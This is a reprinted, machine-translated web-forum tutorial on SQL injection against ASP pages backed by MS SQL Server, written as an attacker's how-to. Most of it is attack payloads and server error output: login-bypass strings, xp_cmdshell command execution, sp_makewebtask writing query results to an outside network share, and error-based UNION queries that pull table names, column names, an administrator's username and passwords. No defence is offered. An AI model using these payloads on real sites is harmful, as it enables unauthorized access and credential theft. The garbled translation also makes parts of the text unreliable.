2. Tech
  3. SQL injection

SQL injection

xiaoxiao2021-03-06  15

SQL injection

Reprinted from: Xiaoxi of the fox

1.0 introduction

When a machine only opens 80 ports (hereby providing HTTP services), you may not give you a lot of valuable information (vulnerability information), if this machine's administrator If it is often playing Patch for his server, we have to attack the head of the attack to the web service. SQL Injection Attack is one of the web attack type. This attack has no special requirements, and only the other party provides normal HTTP services, and does not need to pay attention to whether the administrator is "Patch Mad". Such attacks are mainly for some kind of web handler such as ASP, JSP, PHP, CGI, etc.).

This article is not to introduce any new "玩", and SQL injection attack has been widely circulated. The reason why I am writing this article is because I want to record some of my experiences from my recent experiment, I hope to give readers some references. You can also find more people written by others in "9.0 I can get more related information?" The column of SQL injection techniques.

1.1 What is SQL injection?

This attack is to put SQL's query / behavior commands into a legitimate HTTP submission request via 'embedd' to achieve an attacker's intention. Many dynamic web pages now get some parameters from the request from the web, and then dynamically constitute SQL requests to the database. For example, when a user needs to log in (user authentication) on the web page, the dynamic web page will

The username submitted by the user is added to the SQL inquiry request to the database to confirm whether the authentication information submitted by the user is valid. At the perspective of SQL injection attacks, we can achieve the purpose of attacking the attack by modifying the username and / or password value when sending SQL requests.

1.2sql injection requires what (tools, etc.)?

One (some) web browser.

2.0 What information is what you need to find?

First you need to find a page that allows submission of data, such as: Landing page, search page, feedback page, and more. Sometimes, some HTML pages will pass the required parameters to other ASP pages via the post command. So, sometimes you don't see the relevant parameters in the URL path. Despite this, you can still distinguish whether there is parameter pass by viewing the "Form" tab in the source code of HTML. The relevant code is as follows:

Each parameter transfer between the "Form> and " may be utilized (using SQL injection in the case of attack).

2.1 What should you do when you can't find a page with an input behavior?

You can find some pages of related ASP, JSP, CGI, or PHP. Try find some special URLs with certain parameters, such as:

http://duck/index.asp? id = 10

3.0 How should you test these defects?

First add some special character tags, enter as:

Hi 'OR 1 = 1 -

Find some landing page, entered in its login ID and password input, or in the URL:

- login: hi 'or 1 = 1 -

- Pass: hi 'or 1 = 1 -

- http://duck/index.asp? id = hi 'or 1 = 1--

If you want to perform such tests with 'hidden', you can download the HTML page from the website to your local hard drive, modify its hidden part

Value, such as:

If you are lucky, it is estimated that you can now do not need your account and password, 'successful landing'.

3.1 Why is it using 'OR 1 = 1 -?

Let's take a look at the importance of using 'OR 1 = 1 in another example. Nominal login mode, using such a landing method may get some special information that cannot be obtained in the normal landing. Use the ASP page you get in a link to computers:

http://duck/index.asp? category = food

In this URL above, 'category' is a variable name, and 'food' is a value given to the variable. In order to do this (link success),

This ASP must contain the following related code (below is also the code we wrote in this experiment):

v_cat = request ("category")

SQLSTR = "SELECT * from Product where pcategory = '" & v_cat ""

SET RS = Conn.execute (SQLSTR)

As we see, the variable value will pre-deal with and assign the value of 'v_cat', that is, the SQL statement will change:

Select * from product where pcategory = 'food'

This request will return the result obtained after the WHERE condition, which is 'Food' in this example. Now imagine if

We change the URL to this way:

http://duck/index.asp? category = food 'or 1 = 1 -

Now our variable V_cat is equivalent to "Food 'or 1 = 1--", now if we want to resize the SQL request,

That SQL request will be:

Select * from product where pcategory = 'food' or 1 = 1-- '

Now this request will pick each message from the Product table and will not pay attention to whether Pcategory is equal to 'FOOD'. As for the two '-' (dash) at the end, it is used to tell 'MS SQL Server ignore the last' (single number). Sometimes you can use the '#' (Well number) instead of '-' (double broken number) here.

Anyway, if the other party is not a SQL server (here is MS SQL Server), or you can't use a simple way to ignore the last single quotes, you can try:

'or' a '=' a

This kind of SQL request will change:

Select * from product where pcategory = 'food' or 'a' = 'a'

It also returns the same result.

According to the actual situation, SQL injection requests can have a variety of dynamic changes:

'OR 1 = 1--

OR 1 = 1--

OR 1 = 1--

'or' a '=' a

"or" a "=" a ') or (' a '=' a

4.0 How do I join an instant execution command in the SQL injection request?

Servers that can perform SQL injection are usually some machines that are negligible to systematically configure check. At this point we can try to execute requests with SQL commands. The default MS SQL server is running under the System administrator, which is equivalent to the execution and access of the system administrator. We can use the MS SQL Server extension storage process (such as master..xp_cmdshell et al.) To perform some of the commands of the remote system:

'; exec master..xp_cmdshell' ping 10.10.1.2 '-

If you fail, you can try it with "(dual quotation marks) instead '(single quotes).

The second colon in the above example represents the end of a SQL request (also on behalf of it, following a new SQL command). To verify that the PING command is successful, you can listen to the ICMP request package on 10.10.1.2, and confirm that it is from that SQL server:

#tcpdump ICMP

If you can't get a PING request from that SQL server, you get an error message in the return value of the SQL request, it is possible because the SQL server's administrator limits the web user access these storage procedures.

5.0 How can I get the relevant return information about the SQL request I sent?

We can write the URL using the relevant request for the sp_makewebtask handling process:

'; Exec Master..sp_makewebtask "//10.10.1.3/share/output.html", "SELECT * FROM INFORMATION

_SChema.tables "

However, the prerequisites are the "Share" attribute of the target host must be set to "Everyone".

6.0 How can I get some important data from the ODBC error message returned from the database?

We can force MS SQL Server from returning information (such as table names, column names, etc.) from the returned information. For example, there is such a URL:

http://duck/index.asp? id = 10

In the above URL we can try to use the Union clause to add other request strings after the integer '10', such as:

http://duck/index.asp? id = 10 Union Select Top 1 Table_name from information_schema.tables -

The system table in the above example information_schema.tables includes information on all tables in this server. As for the table_name area, the name of each table is included. We have to choose this because we know that it must exist. In other words, our SQL inquiry

Asking the request is:

SELECT TOP 1 TABLE_NAME from Information_Schema.Tables-

The server will return the first table name of the database after receiving the request data. When we use the UNION clause to add the request string to an integer 10, MS SQL Server will try to convert the string as an integer value. Since we can't turn string (nvarchar) to an integer type (int), the system generates an error. The server will display the following error message:

Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE '

Table1 'to a column of data type int.

/index.asp, line 5

Very good, this error message tells us that all related information that appears (including the table name we want to know). In this example, we know that the first table name is "table1". To get the next table name, we can send such a request: http://duck/index.asp? Id = 10 Union Select top 1 Table_name from information_schema.tables White

ERE Table_name Not in ('Table1') -

We can also find related special words via Like:

http://duck/index.asp? id = 10 Union Select Top 1 Table_name from Information_schema.tables White

ERE Table_name Like '% 25Login% 25' -

Output results:

Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE '

Admin_login 'to a Column of Data Type Int.

/index.asp, line 5

6.1 How to find out the column name in the table?

We can use another important table information_schema.columns to list all the column names of a table:

Http: //duck/index.asp? id = 10 Union Select Top 1 Column_Name from Information_SChema.columns

Where Table_name = 'admin_login' -

The output is displayed:

Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE '

Login_ID 'to a column of data type int.

/index.asp, line 5

Now I have obtained the name of the first column, we can also get the next column name with Not in ():

Http: //duck/index.asp? id = 10 Union Select Top 1 Column_Name from Information_SChema.columns

WHERE TABLE_NAME = 'admin_login' where colorn_name not in ('login_id') -

Output results:

Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE '

Login_name 'to a column of data type INT.

/index.asp, line 5

If we continue to repeat this, we will get the remaining column names, such as "Password", "Details". When we use the following request (except the column name other than 'Login_ID', 'login_name', 'Password'): http://duck/index.asp? Id = 10 Union Select Top 1 color_name from information_schema.columns

WHERE TABLE_NAME = 'admin_login' Where colorn_name not in ('login_id', 'login_name ",' password '

Details') -

Get it after output:

Microsoft Ole DB Provider for ODBC Drivers Error '80040e14'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Order by Items Must Appear in The SELECT LIST IF The Statement Contains a Union Operator.

/index.asp, line 5

6.2 How do I find the data we need?

Now we need to identify some more important tables and columns, we can use the same trick to ask the database to get relevant information.

Let us now ask the first username of the "admin_login" table:

http://duck/index.asp? id = 10 Union Select Top 1 login_name from admin_login -

Output:

Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE 'NEO' to a Column of Data Type Int.

/index.asp, line 5

I know that a administrator account is "neo". Finally, what is the password of this administrator account:

http://duck/index.asp? id = 10 Union Select Top 1 Password from admin_login where login_name = '

NEO '-

Output:

Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE '

M4trix 'to a column of data type int.

/index.asp, line 5

Now we can use "NEO" to log in to his password ("m4trix").

6.3 How to get a digital string value?

A limitations of expression herein. To convert numbers (numbers between 0-9) to normal text data, we will not be able to get the error prompt information we need. For example, we have to try the password "Trinity", and the password it corresponds to "31173":

http://duck/index.asp? id = 10 Union Select Top 1 Password from admin_login where login_name = 'trinity' -

This way we can only get the error prompts such as "Page Not Found". The main problem in this is that the password "31173" will be converted to a value after the collection is collected (using the UNION clause) in an integer (which is 10). In this case, this Union word call is the 'legal', the SQL server will not return any ODBC error messages, so we can't get these digital data.

To solve this problem, we can add some alphabets to these data strings to determine that the conversion process is wrong. Let's try

Use the following request to replace the original request:

http://duck/index.asp? id = 10 Union Select Top 1 Convert (int, password% 2b '% 20 morpheus') from

Admin_login where login_name = 'trinity' -

Here we are just joining a ( ) plus sign and other characters we want to join (' ' is equal to 0x2b in ASCII). We joined a (% 20) space and Morpheus into the actual password data. In this case, even if we get the number string '31173', it will also become '31173 Morpheus'.

After executing the CONVERT () function, the system will try to convert the '31173 Morpheus' to an integer type, and the SQL server will return such an ODBC error message:

Microsoft OLE DB Provider for ODBC Drivers Error '80040E07'

[Microsoft] [ODBC SQL Server Driver] [SQL Server] Syntax Error Converting The NVARCHAR VALUE '

31173 Morpheus' to a column of data type int.

/index.asp, line 5

Now you can know the password of 'Trinity' is '31173'.

转载请注明原文地址:https://www.9cbs.com/read-46626.html

9cbs

New Post(0)